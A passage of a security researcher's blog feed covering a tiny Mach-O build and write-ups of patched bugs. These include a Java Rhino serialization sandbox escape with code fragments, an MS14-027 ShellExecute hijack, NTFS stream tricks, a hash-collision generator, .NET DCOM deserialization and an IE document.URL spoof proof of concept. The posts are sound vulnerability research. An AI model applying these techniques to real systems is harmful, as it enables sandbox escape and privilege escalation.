Quantcast
Channel: Tyranid's Lair
Viewing all 81 articles
Browse latest View live

The Quest for a Small Mach-O

$
0
0
For my sins I have recently actually enjoyed using OS X. There is just something about its unix'ness which appeals to me (though I would rather not have to pay for it to begin with). Anyway one of the first things I tend to do on an OS is to try and write as small an executable as possible and this is not the time to change that.

So this is maybe the first post of many on creating something small :) Note: I am working on Snow Leopard and producing 32bit code, YMMV.

Step 1: What can we do with basic tools?

So lets start with a normal development environment to see what we can get without having to writing anything custom. Before we can do anything we need some code, here is a simple entry point with no reliance on external libraries, just straight into the exit syscall.
void start(void) {
// Call exit(0)
__asm__ volatile (
"push $0\n"
"movl $1, %eax\n"
"int $0x80\n"
);
}
It is worth pointing out that without this exit syscall your new application will just SIGBUS, not exactly optimal.

Now just need to link it, we will choose to link statically (which should get rid of anything to do with the dynamic linker, which might have to change as we go along).
all: test1

test1: test1.c
$(CC) -c -o test1.o test1.c
$(LD) -o test1 -s -static -e _start test1.o

clean:
rm -f test1 *.o
And our survey says? 4096 bytes, bugger. Well I guess page alignment is a killer. Of course using hexdump shows that over 3/4 of the file is empty. Still there is some hope for the future, running otool -lv over the output application shows that the entire 4k is being loaded into memory, a classic trick in making small binaries. Some nice sounding options in the ld man page (such as -pagezero_size and -seg_page_size) just don't seem to work as expected so no doubt something more custom is required next time.

Onwards and upwards.

The Quest : Part 2

$
0
0
So the last try at making a small Mach-O binary didn't really work. Now I could start fiddling with the linker to see if I can make things smaller but I am not particularly up on my Apple linker usage so instead lets just straight to the binary assembler :)

Fortunately Apple choose to install nasm by default (well when you install the developers' tools), so we just need to understand how a mach-o binary is laid out. This is some official documentation about the file format (and there is the referenced header files installed with the dev tools). Using the otool utility also gives a good idea of what is in a real binary (try running with the -l command on the previous static binary to see what you get).

Anyway as with last time I still want this executable to not require any dirty tricks, although looking at the file format there isn't many obvious ones we could employ (at least compared to some of the stunts you can play with ELFs).

So what needs to be in a valid mach-o? The header, obviously, is required, then a number of load commands. It turns out (through a bit of reading the source) that you only actually need a LC_UNIXTHREAD (or LC_THREAD) command and the executable will load, seems unlike most other executable formats the entry point is not a field in the headers but is inferred by specifying the initial thread context.

Of course without any code in memory this isn't exactly that useful (well not immediately) so we also need to specify an LC_SEGMENT load command. This will map some of our binary into memory and we are ready to go. As a short aside if you look at the output of otool -l under most segments there are also sections, these are as far as I can tell unnecessary, and are more meta-data to make linking more consistent.
; A basic Mach-O executable
; (c) Tyranid 2010
BITS 32

ORG 0x1000

_program_start:

; mach_header
dd 0xfeedface ; MH_MAGIC
dd 7 ; cputype
dd 3 ; cpusubtype
dd 2 ; filetype
dd 2 ; ncmds
dd _cmd_end-_cmd_start ; sizeofcmds
dd 0x2001 ; flags

_cmd_start:

_segment_cmd:
dd 1 ; LC_SEGMENT
dd _segment_cmd_end-_segment_cmd ; sizeofcmd
_segment_name: ; segname
db "__TEXT"
times 16-$+_segment_name db 0
dd _program_start ; vmaddr
dd ((_program_end-_program_start)+4095)&~4095 ; vmsize
dd 0 ; fileofs
dd _program_end-_program_start ; filesize
dd 7 ; maxprot
dd 5 ; initprot
dd 0 ; nsects
dd 4 ; flags

_segment_cmd_end:

_thread_cmd_start:
dd 5 ; LC_UNIXTHREAD
dd _thread_cmd_end-_thread_cmd_start ; sizeofcmd
dd 1 ; flavor (i386_THREAD_STATE)
dd (_registers_end-_registers_start)/4 ; count

_registers_start:
dd 0 ; unsigned int __eax;
dd 0 ; unsigned int __ebx;
dd 0 ; unsigned int __ecx;
dd 0 ; unsigned int __edx;
dd 0 ; unsigned int __edi;
dd 0 ; unsigned int __esi;
dd 0 ; unsigned int __ebp;
dd 0 ; unsigned int __esp;
dd 0x1F ; unsigned int __ss;
dd 0 ; unsigned int __eflags;
dd _start ; unsigned int __eip;
dd 0x17 ; unsigned int __cs;
dd 0x1F ; unsigned int __ds;
dd 0x1F ; unsigned int __es;
dd 0 ; unsigned int __fs;
dd 0 ; unsigned int __gs;
_registers_end:

_thread_cmd_end:

_cmd_end:

_start:
; Call exit(42)
push byte 42
push byte 1
pop eax
push eax
int 0x80

_program_end:

Throw it through nasm in binary mode and what do we get? 172 bytes, far smaller. There are some further tricks you could play with this, such as embedding the code inside the thread context (as only EIP and probably the segment registers are important) or actually store a few of the necessary values in the context to slightly reduce the pushes. Still 172 is alright for now, can it go any lower?

Fun with Java Serialization and Reflection

$
0
0
Last year I started to have a poke at Java for security vulnerabilities, I am not really sure why, but probably because I was having some success breaking .NET and felt Java was likely to have similar issues. Shame I picked a bad time to do so if I wanted to be famed for owning Java (re: Security Explorations). Still I think I found a few things Adam Gowdiak didn't find :)

Anyway, with the recent fixing of my last Java vulnerability in 7 update 13 (CVE-2012-3213 if  you care) I felt it was a good time to describe what it did and how it worked, especially as it is a mixture of the classic Java serialization vulnerabilities mixed with the hot topic of reflection, making it an interesting vulnerability. It will also describe another source of access to protected package Class objects.

The underlying issue is in the Rhino script engine. This is a Javascript interpreter built into modern versions of the JRE (from version 6 onwards) and originally comes from a Mozilla project where it was primarily designed to run in a fully trusted environment. It has had security issues before (for example see CVE-2011-3544) as Sun/Oracle decided to make it work in a sandboxed Java environment. However to exploit what I found you have to be a bit creative.

A Quick Overview of Rhino Security

As the script engine could potentially create user-defined but trusted code one of the things that was added to the engine was some checks to prevent sandboxed code from calling into objects which might have dangerous side effects, for example gaining access to protected packages such as 'sun.*'. In order to access a native Java object the engine must first wrap it with a scriptable wrapper by using a WrapFactory. The JRE provides a custom implementation in com.sun.script.javascript.RhinoWrapFactory which does these checks before the Javascript is allowed to call methods on that object. In that code it checks things like whether the object is a ClassLoader (which might allow the script to bypass package access checks in loadClass etc.), it also checks for the package name of Class objects and classes to see if they are visible to scripts (ultimately calling the current security manager's checkPackageAcccess method). There are some exclusions though, because the core Rhino classes are actually embedded within the sun.* package which means it can at least get access to those. At any rate what this ultimately results in is I couldn't see an immediate way of using the script engine to call into protected classes to do something nasty.

Bug Hunting in the Javascript World

The fact that these wrapping mechanisms are needed are a good example of some of the differences between Java and Javascript. You could consider Javascript to have one of the most flexible reflection implementations, all objects are reflectable (well of course depending on the implementation), for example to determine what properties and functions an object supports you can do something as simple as:

for(x in obj)
{
System.println(x+": " + typeof(obj[x])");
}
You can dispatch methods or read properties by just using the obj[x] syntax. The Rhino script engine aims to  replicate this functionality even for native Java objects by providing isolated scriptable wrappers around common reflection primitives such as methods, fields and constructors. You can find these under the sun.org.mozilla.javascript.internal package with classes such as NativeJavaConstructor and NativeJavaMethod. The interesting thing I noticed was these were not performing any further reflection checks on the classes they were interacting with, presumably if you could get access to one of these classes you must have already gone through the object wrapping process and that would have blocked the package access. And so it seems, after a bit of digging I managed to find the syntax for getting access to the constructor object using the following code:

importClass(Packages.sun.swing.SwingLazyValue); 

SwingLazyValue['(java.lang.String,java.lang.String,java.lang.Object[])'];

This would get you a constructor on the SwingLazyValue class (which is a useful execution pivot in the JRE to call internal static functions, especially as it is based on a public interface we can access and call through). But if you try this in a sandboxed environment it fails with an exception due to the package access of the Class object, so close but so far. Still there is clearly a way of exploiting it otherwise I wouldn't be documenting it.

Serialization to the Rescue

If you look at the class hierarchy of the NativeConstructor class you will notice something interesting (or at least you would have done prior to update 13), it implemented the Serializable interface. So perhaps instead of using Javascript to access the constructor we could instead use serialization. The advantage of this approach is we might be able to reconstruct the object in native Java code first (which won't necessarily complain about it) and then pass it back into Javascript for the final exploitation.

I knocked up a simple full trust application which would capture a NativeConstructor object, serialize it then check it deserialized correctly. I went to run it, but it threw an exception because some internal fields could not be serialized. Damn... Looking through the documentation it looks like serialization was a vestigial feature of the original Mozilla implementation, Sun had not bothered to ensure it still worked correctly, so I followed a hunch, perhaps the object doesn't actually need those unserializable fields, perhaps I can just remove them. Fortunately Java makes it relatively easy to do this by implementing the replaceObject method on the java.io.ObjectOutputStream class.

A few minutes later I had:

class MyObjectOutputStream extends ObjectOutputStream {
public MyObjectOutputStream(OutputStream stm) throws Throwable {
super(stm);
enableReplaceObject(true);
}

protected Object replaceObject(Object o) {
String name = o.getClass().getName();
if(name.startsWith("com.sun.script.javascript.")) {
return null;
}
return o;
}
}

Running this in my full trust application my hunch was proven correct, the script didn't in fact need those internal fields to work and the NativeConstructor object could be used freely when deserialized. Feeling the end was in sight I plugged it into an Applet, I took the binary output from the full trust application and deserialized it, I was dissappointed to be greeted with:

java.security.AccessControlException: access denied 
("java.lang.RuntimePermission"
"accessClassInPackage.sun.org.mozilla.javascript.internal")
at java.security.AccessControlContext.checkPermission(AccessControlContext.java)
at java.security.AccessController.checkPermission(AccessController.java)
at java.lang.SecurityManager.checkPermission(SecurityManager.java)
at java.lang.SecurityManager.checkPackageAccess(SecurityManager.java)
at sun.applet.AppletSecurity.checkPackageAccess(AppletSecurity.java)
at sun.applet.AppletClassLoader.loadClass(AppletClassLoader.java)
at java.lang.ClassLoader.loadClass(ClassLoader.java)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java)
at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java)
at Demo.doExploit(Demo.java)

So I seemed to have gained nothing, I traded a package access check for one type to one from the Rhino implementation. Still all was not lost, I had a plan.

Ask and You Shall Receive

Now if you look at the stack trace of the exception one method frame is clearly responsible for it, the java.io.ObjectInputStream.resolveClass method. If you go and look at the implementation of that it is passing the current class loader into the forName method, which in an Applet is the AppletClassLoader which doesn't much care for handing out references to sun.* package classes. Still serialization in Java (compared to .NET with which I have bit of experience) is an unprivileged operation, even sandboxed code can do it, and there are also some things you can do to modify the process of serialization to do some funky things, like overriding the resolveClass implementation. So this led me to the realization that perhaps if I could get the protected Class objects from somewhere else then I could implement my own ObjectInputStream, override the resolveClass method and return what I needed. So I put together:

class MyObjectInputStream extends ObjectInputStream {
Hashtable dict;

public MyObjectInputStream(InputStream stm, Hashtable dict)
throws IOException {
super(stm);
this.dict = dict;
}

protected Class resolveClass(ObjectStreamClass clazz)
throws Throwable {

if(dict.containsKey(clazz.getName())) {
return (Class)dict.get(clazz.getName());
} else {
return super.resolveClass(clazz);
}
}
}

This class would take a Hashtable containing some classes, if we already had the required Class object we could return it as is so we don't get the security exception, but of course this begs the question, how will we populate the dictionary? Well the key is in serialization itself.

We already know that the the NativeJavaConstructor class is serializable, we also know untrusted code can perform the serialization process and that untrusted code can create the NativeJavaConstructor objects as long as they point to non-privileged classes. So can we not use the serialization process against itself to get access to all the classes we need?

Turns out we cannot directly use the ObjectOutputStream with the overloaded replaceObject method as that is actually one of the few privileged operations in the serialization process (something to do with access to private fields or something). Anyway so we will go to the source of how ObjectOutputStream determines what to serialize, the ObjectStreamClass class. You can call this from untrusted code and it will return you a description of the object, including the classes of the object's fields. From this you can take copies of the classes and keep them for the input stream to use. Such as:

public void captureTypes(Object o) {
try {
Class c = o.getClass();

while(c != Object.class) {
dict.putClass(c);

ObjectStreamClass stmClass = ObjectStreamClass.lookup(c);
ObjectStreamField[] fs = stmClass.getFields();

for(int i = 0; i < fs.length; ++i) {
Class fc = fs[i].getType();
dict.putClass(fc);
}

c = c.getSuperclass();
}

} catch(Throwable e) {}
}

This fills in the dictionary and you are good to go. And amazingly this does work... From that I could do things like create my SwingLazyValue which would call a static method such as SunToolkit.getField and that was the end of the road for the sandbox. Of course how you actually go about getting the sun.swing.SwingLazyValue Class object is left as an exercise for the reader ;)

Conclusion

Well it looks like the fix was simple in 7u13, anything within Rhino which could be serialized now cannot which considering they never were without substantial effort I guess isn't an issue from a break-compatibility point of view. But it does once again show that package access restrictions, especially with serialization are not adequate to protect Java from itself.

Impersonation and MS14-027

$
0
0
The recent MS14-027 patch intrigued me, a local EoP using ShellExecute. It seems it also intrigued others so I pointed out how it probably worked on Twitter but I hadn't confirmed it. This post is just a quick write up of what the patch does and doesn't fix. It turned out to be more complex than it first seemed and I'm not even sure it's correctly patched. Anyway, first a few caveats, I am fairly confident that what I'm presenting here is already known to some anyway. Also I'm not providing direct exploitation details, you'd need to find the actual mechanism to get the EoP working (at least to LocalSystem).

I theorized that the issue was due to mishandling of the registry when querying for file associations. Specifically the handling of HKEY_CLASSES_ROOT (HKCR) registry hive when under an impersonation token. When the ShellExecute function is passed a file to execute it first looks up the extension in the HKCR key. For example if you try to open a text file, it will try and open HKCR\.txt. If you know anything about the registry and how COM registration works you might know that HKCR isn't a real registry hive at all. Instead it's a merging of the keys HKEY_CURRENT_USER\Software\Classes and HKEY_LOCAL_MACHINE\Software\Classes. In most scenarios HKCU is taken to override HKLM registration as we can see in the following screenshot from Process Monitor (note PM records all access to HKLM classes as HKCR confusing the issue somewhat). 





When ShellExecute has read this registry key it tries to read a few values out it, most importantly the default value. The value of the default value represents a ProgID which determines how the shell handles the file extension. So for example the .txt extension is mapped to the ProgID 'txtfile'.

The ProgID just points ShellExecute to go reading HKCR/txtfile and we finally find what we're looking for, the shell verb registrations. The ShellExecute function also takes a verb parameter, this is the Action to perform on the file, so it could be print or edit but by far the most common one is open. There are many possible things to do here but one common action is to run another process passing the file path as an argument. As you can see below a text file defaults to being passed to NOTEPAD.

Now the crucial thing to understand here is that HKCU can be written to by a normal, unprivileged user. But HKCU is again a fake hive and is in fact just the key HKEY_USERS\SID where SID is replaced with the string SID of the current user (see pretty obvious, I guess). And even this isn't strictly 100% true when it comes to HKCR but it's close enough. Anyway, so what you might be asking? Well this is wonderful until user Impersonation gets involved. If a system or administrator process impersonates another user it's also suddenly finds when it accesses HKCU it really accesses the impersonated user's keys instead of its own. Perhaps this could lead to a system service that is  impersonating a user and then calls ShellExecute to start up the wrong handler for a file type leading to arbitrary execution at a higher privilege. 

With all this in mind lets take a look at patch in a bit more depth. The first step it to diff the patched binary with the original, sometimes easier said than done. I ran an unpatched and patched copies of shell32.dll through Patchdiff2 in IDA Pro which lead to a few interesting changes. In the function CAssocProgidElement::_InitFileAssociation a call was added to a new function CAssocProgidElement::SetPerMachineRootIfNeeded.


Digging into that revealed what the function was doing. If the current thread was impersonating another user and the current Session ID is 0 and the file extension being looked up is one a set of specific types the lookup is switched from HKCR to only HKLM. This seemed to confirm by suspicions that the patch targeted local system elevation (the only user on session 0 is likely to be LocalSystem or one of the service accounts) and it was related to impersonation.




Looking at the list of extension they all seemed to be executables (so .exe, .cmd etc.) so I knocked up a quick example program to test this out.


Running this program from a system account (using good old psexec -s) passing it the path to an executable file and the process ID of one of my user processes (say explorer.exe) I could see in process monitor it's reading the corresponding HKCU registry settings.








Okay so a last bit of exploitation is necessary I guess :) If you now register your own handler for the executable ProgID (in this case cmdfile), then no matter what the process executes it will instead run code of the attacker's choosing at what ever privilege the caller has. This is because Impersonation doesn't automatically cross to new processes, you need to call something special like CreateProcessFromUser to do that.


So how's it being exploited in the real world? I can't say for certain without knowing the original attack vector (and I don't really have the time to go wading through all the system services looking for the bad guy, assuming it's even Microsoft's code and not a third party service). Presumably there's something which calls ShellExecute on an executable file type (which you don't control the path to) during impersonating another user.

Still is it fixed? One thing I'm fairly clear on is there seems to still be a few potential attack vectors. This doesn't seem to do anything against an elevated admin user's processes being subverted. If you register a file extension as the unprivileged user it will get used by an admin process for the same user. This is ultimately by design, otherwise you would get inconsistent behaviour in elevated processes. The fix is only enabled if the current thread is impersonating and it's in session 0 (i.e. system services), and it's only enabled for certain executable file types.

This last requirement might seem odd, surely this applies to any file type? Well it does in a sense, however the way ShellExecute works is if the handling of the file type might block it runs the processing asynchronously in a new thread. Just like processes, threads don't inherit impersonation levels so the issue goes away. Turns out about the only thing it treats synchronously are executables. Well unless anyone instead uses things like FindExecutable or AssocQueryString but I digress ;-) And in my investigation I found some other stuff which perhaps I should send MS's way, let's hope I'm not too lazy to do so.


Abusive Directory Syndrome

$
0
0
As ever there's been some activity recently on Full Disclosure where one side believes something's a security vulnerability and the other says it's not. I'm not going to be drawn into that debate, but one interesting point did come up. Specifically that you can't create files in the root of the system drive (i.e. C:\) as a non-admin user, you can only create directories. Well this is both 100% true and false at the same time, it just depends what you mean by a "file" and who is asking at the time.

The title might give the game away, this is all to do with NTFS Alternate Data Streams (ADS). The NTFS file system supports multiple alternative data streams which can be assigned to a file, this can be used for storing additional attributes and data out-of-band. For example it is used by Internet Explorer to store the zone information for a downloaded file so the shell can warn you when you try to execute a file from Internet. Streams have names and are accessed using a special syntax, filename:streamname. You can easily create a data stream using the command prompt, type the following (in a directory you can write to):

echo Hello > abc
echo World! > abc:stm

more < abc - Prints Hello
more < abc:stm - Prints World!


Easy no? Okay lets try it in the root of the system drive (obviously as a normal user):

echo Hello > c:\abc:stm - Prints Foxtrot Oscar
Oh well worth a try, but wait there's more...  One of the lesser known abilities of ADS, except to the odd Malware author, is you can also create streams on directories. Does this create new directories? Of course not, it creates file streams which you can access using file APIs. Let's try this again:

mkdir c:\abc
echo Fucking Awesome! > c:\abc:stm
more < c:\abc - File can't be found
more < c:\abc:stm - Prints Fucking Awesome!

Well we've created something which looks like a file to the Windows APIs, but is in the root of the system drive, something you're not supposed to be able to do. It seems deeply odd that you can:

  • Add an ADS to a directory, and 
  • The ADS is considered a file from the API perspective

Of course this doesn't help us exploit unquoted service paths, you can't have everything. Still when you consider the filename from a security perspective it has an interesting property, namely that its nominal parent in the hierarchy (when we're dealing with paths that's going to be what's separated by slashes) is C:\. A naive security verification process might assume that the file exists in a secure directory, leading to a security issue.

Take for example User Account Control (UAC), better know as the "Stop with the bloody security dialogs and let me get my work done" feature which was introduced in Vista. The service which controls this (Application Info) has the ability to automatically elevate certain executables, for controlling the UI (UIAccess) or to reduce the number of prompts you see. It verifies that the executables are in a secure directory such as c:\windows\system32 but specifically excludes writeable directories such as c:\windows\system32\tasks. But if you could write to Tasks:stm then that wouldn't be under the Tasks directory and so would be allowed? Well let's try it!

echo Hello > c:\windows\system32\tasks:stm
more < c:\windows\system32\tasks:stm - Access Denied :(

Why does it do that? We only have to take a look at the DACL to find out why, we have write access to Tasks but not read:

c:\>icacls c:\Windows\system32\tasks
c:\Windows\system32\tasks BUILTIN\Administrators:(CI)(F)
BUILTIN\Administrators:(OI)(R,W,D,WDAC,WO)
NT AUTHORITY\SYSTEM:(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(R,W,D,WDAC,WO)
NT AUTHORITY\Authenticated Users:(CI)(W,Rc)
NT AUTHORITY\NETWORK SERVICE:(CI)(W,Rc)
NT AUTHORITY\LOCAL SERVICE:(CI)(W,Rc)
CREATOR OWNER:(OI)(CI)(IO)(F)

Oh well... Such is life. We've managed to create the stream but can't re-read it, awesome Write Only Memory. Still this does demonstrate something interesting, the DACL for the directory is applied to all the sub-streams even though the DACL might make little sense for file content. The directory DACL for Tasks doesn't allow normal users to read or list the directory, which means that you can't read or execute the file stream.

In conclusion all you need to be able to create an ADS on a directory is write access to the directory. This is normally so you can modify the contents of the directory but it also applies to creating streams. But the immediate security principal for a stream then becomes the parent directory which might not be as expected. If I find the time I might blog about other interesting abuses of ADS at a later date.

Addictive Double-Quoting Sickness

$
0
0
Much as I'd love it if people who used "Scare Quotes" (see what I did there) were punished appropriately I doubt my intolerance is shared sufficiently amongst the general population. So this blog's not about that, but something security related which keeps on popping up, when it really shouldn't.

Still if I could be as loved as Mike Myers it might be worth using them myself. Wait...
This is a post about abusing ADS, but what I'm going to talk about is something I refer to as Domain-Specific Weirdness, at least when I'm bored and decide to make stuff up. The term refers to those bugs which are due to not understanding the differences between domain-specific representations. A far too common coding pattern you'll see on Windows in "Secure" systems (I really need help), is something like the following:
path = GetExecutablePath();

if(ValidAuthenticode(path)) {
cmdline = '"' + path + '"';

CreateProcess(NULL, cmdline, ...);
}

The security issue appears when the executable path is influenced by untrusted code. The ValidateAuthenticode function verifies the file is signed by a specific certificate. Only if that passes will the executable be started. This hits so many bugs classes as it is, poor input validation, TOCTOU between the validation and process creation and also failing to pass the first argument to CreateProcess. But the sad thing is you see it in real software by real companies, even Microsoft.

Now to be fair the one thing the code does right is it ensures the path is double-quoted before passing it to CreateProcess. At least you won't get some hack hassling you for executing C:\Program.exe again. But process command lines and file paths are two completely different interpretation domains. CreateProcess pretty much follows how the standard C Runtime parses the process path. The CRT is open-source, so we can take a look at how the executable name is parsed out. In there you'll find the following comment (the file's stdargv.c if you're curious):
/* A quoted program name is handled here. The handling is much
simpler than for other arguments. Basically, whatever lies
between the leading double-quote and next one, or a terminal null
character is simply accepted. Fancier handling is not required
because the program name must be a legal NTFS/HPFS file name.
Note that the double-quote characters are not copied, nor do they
contribute to numchars. */
You've got to love how much MS still cares about OS/2. Except this is of course rubbish, the program name doesn't have to be a legal NTFS/HPFS file name in any way. Especially for CreateProcess. The rationale for ignoring illegal program names is because NTFS, like many file systems have a specific set of valid characters.

What's a valid NTFS file name you might ask? You can go look it up in MSDN, instead I put together a quick test case to find out.
#include <stdio.h>
#include <Windows.h>
#include <string>

int wmain(int argc, WCHAR* argv[])
{
for (int i = 1; i < 65536; ++i)
{
std::wstring name = L".\a";
name += (WCHAR)i;
name += L"a";

HANDLE hFile = CreateFile(name.c_str(),
GENERIC_READ | GENERIC_WRITE, FILE_SHARE_DELETE, NULL,
CREATE_ALWAYS, FILE_FLAG_DELETE_ON_CLOSE, NULL);

if (hFile == INVALID_HANDLE_VALUE)
{
printf("Illegal Char: %d\n", i);
}
else
{
CloseHandle(hFile);
}
}

return 0;
}
And it pretty much confirms MSDN, you can't use characters 1 through 31 (0 is implied), 32 (space) has some oddities and you can't use anything in <, >, :, \, ", \, /, |, ?, *. Notice the double-quote sitting there proud, in the middle.

Okay, let's get back to the point, what's this got to do with ADS? If you read this you'll find the following statement: "Any characters that are legal for a file name are also legal for the stream name, including spaces". If you read that and thought it meant that stream names have the same restrictions as file names in NTFS I have a surprise for you. Change the test case so instead of '.\a' we use '.\a:' we find that the only banned characters are, \, / and : quite a surprise. For our "bad" code we can now complete the circle of exploitation. You can pass a file name such as c:\abc\xyz:file" and the verification code will verify c:\abc\xyz:file" but actually execute c:\abc\xyz:file (subtle I know). And the crazy thing about this is there isn't even a way to escape it.

The moral of the story is this, you can never blindly assume that even a single interpretation domain works how you expect it to do, so when you mix domains together pain will likely ensue. This is also why Windows command line processing is so broken. At least *nix passes command line arguments separately, well unless you use something like system(3) (and for that you'll be punished). Making assumptions on the "validity" of a file path just seems inherently untrustworthy.

Hash Collisions of the Non-Cryptographic Kind

$
0
0
Recently I had a bug which required me to create a hash collision between two strings. Fortunately it wasn't a cryptographically secure hashing algorithm, it was only used in a hash table. The algorithm itself was pretty simple, as shown below:
int hash(const char* c, size_t len) {
int h = 0;

while (len > 0) {
h = h * 31 + *c++;
len--;
}

return h;
}

I had one string, say "abc" which I needed to have the same hash as "xyz". As this code was written in C all string comparisons were performed using the standard C string functions. Therefore from a comparison point of view the strings "abc", "abc\0efgh" etc. are equivalent as the comparison function would terminate at the NUL. However because the hashing algorithm takes the entire string including any NUL characters their hash values are not equal. This makes it possible to create a string with the following properties:

char* s = "abc\0"+SUFFIX;
strcmp(s, "abc") == 0

and

H(s) != H("abc")
H(s) == H("xyz")

To generate the collision you might be tempted to try brute force, well good luck with that. Being one for pointless pop culture references I recalled the Exorcist, and realized "The Power of Maths Compels You...", isn't that what the film's about?

On second thoughts perhaps it's about something else entirely?
Clearly Maths holds the key to calculating the hash collision. I had free reign on the characters I could choose to generate the collision which makes it simpler. The key is realising what the hashing algorithm actually does. If you expand out to the original code you get something like the following, where S is the string and N is the length of the string.

h = S[0]*31^N-1 + S[1]*31^N-2 + ... + S[N-1]

Does that look familiar? No? Well What if I changed the value 31 to 2 giving:

h = S[0] << N-1 + S[1] << N-2 + ... + S[N-1] << 0

Look more familiar? It turns out all the hashing algorithm is doing is generating a base31 number. Therefore finding a hash collision mathematically is going to be pretty simple. All we need to do is calculate the hash of the string with a dummy suffix, calculate the difference between the hash of the string with the suffix and the destination hash and finally generate a replacement suffix with that value in base31. So for completeness here's my code in C++.

#include <stdio.h>
#include <string>
#include <iostream>
using namespace std;

int H(int h, const string& s) {
for (char c : s) {
h = h * 31 + c;
}
return h;
}

string collide(const string& target_str, const string& base_str) {
// Initialize suffix with all zeros
string suffix(8, 0);

int target_hash = H(0, target_str);
int base_hash = H(H(0, base_str), suffix);

unsigned int diff = target_hash - base_hash;

for(int i = 7; i > 1; --i) {
suffix[i] = diff % 31;
diff /= 31;
}

suffix[1] = diff;

return base_str + suffix;
}

int main() {
string a = "xyz";
string b = "abc";
string c = collide(a, b);

cout << H(0, a) << ""<< H(0, b) << ""<< H(0, c) << endl;
cout << b.compare(c) << ""<< strcmp(b.c_str(), c.c_str()) << endl;

return 0;
}

Sometimes it pays just to sit down and think through seemingly tricky problems as they tend to be simpler than you imagine.

A Tale of Two .NET Methods

$
0
0
Sometimes the simplest things amuse me. Take for example CVE-2014-0257 which was a bug in the way DCOM was implemented in .NET which enabled an Internet Explorer sandbox escape. Via the DCOM interface you could call the System.Object.GetType method then command the reflection APIs to do anything you like, such as popping the calculator. The COM interface, _Object, which exposed the GetType method only has 4 functions on it, it seemed pretty unlucky that 25% of the interface had a security vulnerability. Still Microsoft fixed this bug and all's well with the world. Then again if you were lucky enough to see any of my IE11 sandbox presentations you might have seen the following slide, although briefly:

Why would I point out the Equals method as well? Well because it also has a bug, one so difficult to fix that basically Microsoft has throw up its hands and given up on Managed DCOM. They've mitigated the issue in the OneClick deployment service (CVE-2014-4073) by reimplementing the DCOM object in native code, but as far as I'm aware they've not fixed the underlying issue.

To understand the problem we have to go back to CVE-2014-0257 and understand why it worked. When the GetType method returns a System.Type instance over DCOM it wraps the object in a COM Callable Wrapper (CCW). This looks to the COM infrastructure as a normal pass-by-reference object so the Type instance stays in the original process (say the ClickOnce service) but exposes the remote COM interfaces to the caller. The Type class is marked as Serializable so why doesn't the CCW implement IMarshal and custom-marshal the object to the caller? It would be a pretty rude thing to do, It would force the CLR to be loaded into a process just because it happened to be communicating with a .NET DCOM server.

If you implement similar code in C# though things change. The result of calling GetType is a local instance of the Type class. How does .NET know how to do this? This is where the IManagedObject interface gets involved. Every CCW implements the IManagedObject interface which has two methods, GetObjectIdentity which is used to determine if the object exists in the same AppDomain and GetSerializedBuffer which, well, I guess the name describes itself.

When a .NET client receives a COM object it tries to see if it's really a .NET object in disguise. To do this it calls QueryInterface for IManagedObject, if that succeed it will then call GetObjectIdentity to see if it's already in the same AppDomain (if so it can just call it directly). Finally it will call GetSerializedBuffer, if the wrapped .NET object is Serializable it will receive a serialized version of the object which it can recreate using the BinaryFormatter class. Yes that BinaryFormatter class.

Oh crap!

This of course works in reverse, if a COM client passes a .NET object to a DCOM server it can cause arbitrary BinaryFormatter deserialization in the server. The Equals method will accept any object by design. So by passing a malicious serializable .NET object to Equals you can end up doing fun things like reflecting an arbitrary Delegate over the DCOM interface. As you can imagine that's bad.

At this point I'll direct you the exploit code, which should make everything clearer, or not. There's actually a lot more to the exploit than it seems :-)

When's document.URL not document.URL? (CVE-2014-6340)

$
0
0
I don't tend to go after cross-origin bugs in web browsers, after all XSS* is typically far easier to find (*disclaimer* I don't go after XSS either), but sometimes they're fun. Internet Explorer is a special case, most web browsers don't make much of a distinction between origins for security purpose but IE does. Its zone mechanisms can make cross-origin bugs interesting, especially when it interacts with ActiveX plugins. The origin *ahem* of CVE-2014-6340 came from some research into a site-locking ActiveX plugin. I decided to see if I could find a generic way of bypassing the site-lock and found a bug in IE which has existed since at least IE6.

Let's start with how an ActiveX control will typically site-lock, as in only allow the control to be interacted with if hosted on a page from a particular domain. When an ActiveX control is instantiated it's passed a "Site" object which represents the container of the ActiveX control. This might be through implementing IObjectWithSite::SetSite or IOleObject::SetClientSite. When passed the site object the well know way of getting the hosting page's URL is to call IHTMLDocument2::get_URL method with code similar to the following:
IOleClientSite* pOleClientSite;
IOleContainer* pContainer;

pOleClientSite->GetContainer(&pContainer);

IHTMLDocument2* pHtmlDoc;

pContainer->QueryInterface(IID_PPV_ARGS(&pHtmlDoc));

BSTR bstrURL;

pHtmlDoc->get_URL(&bstrURL);

// We now have the hosting URL.

Anything which is based on the published Microsoft site-locking template code does something similar. So we can conclude that for a site-locking ActiveX control the document.URL property is important. Even though this is a DOM property it's at the native code level so you can't use Javascript to override it. So I guess we need to dig into MSHTML to find out where the URL value comes from. Bringing up the function in IDA led me to the following:



One of the first things IHTMLDocument2::get_URL calls is CMarkup::GetMarkupPrintUri. But what's most interesting was if this returned successfully it exited the function with a successful return code. Of course if you look at the code flow it only enters that block of code if the markup document object returned from CDocument::Markup has bit 1 set at byte offset 0x31. So where does that get set? Well annoyingly 0x31 is hardly a rare number so doing an immediate search in IDA was a pain, still eventually I found where you could set it, it was in theIHTMLDocument4::put_media function:


Still clearly that function must be documented? Nope, not a bit of it:



Well I could go on but I'll cut the story short for sanity's sake. What the media property does is set whether the document's currently a HTML document or a Print template. It turns out this is an old property which probably should never be used, but is one of those things which's kept around for legacy purposes. As long as you convert the current document to a print template using the OLECMDID_SETPRINTTEMPLATEcommand to ExecWBon the web browser this code path will execute. 

The final step is working out how you influence the URL property. After a bit of digging you'll find the following code in CMarkup::FindMarkupPrintUri



Hmm well it seems to be reading the attribute __IE_DisplayURL from the top element of the document and retuning that as the URL. Okay let's try that, using something like XMLHttpRequest to see if we can read local files. For example:

<html __IE_DisplayURL="file:///c:/">
<body>
<h1>
PoC for IE_DisplayURL Issue</h1>
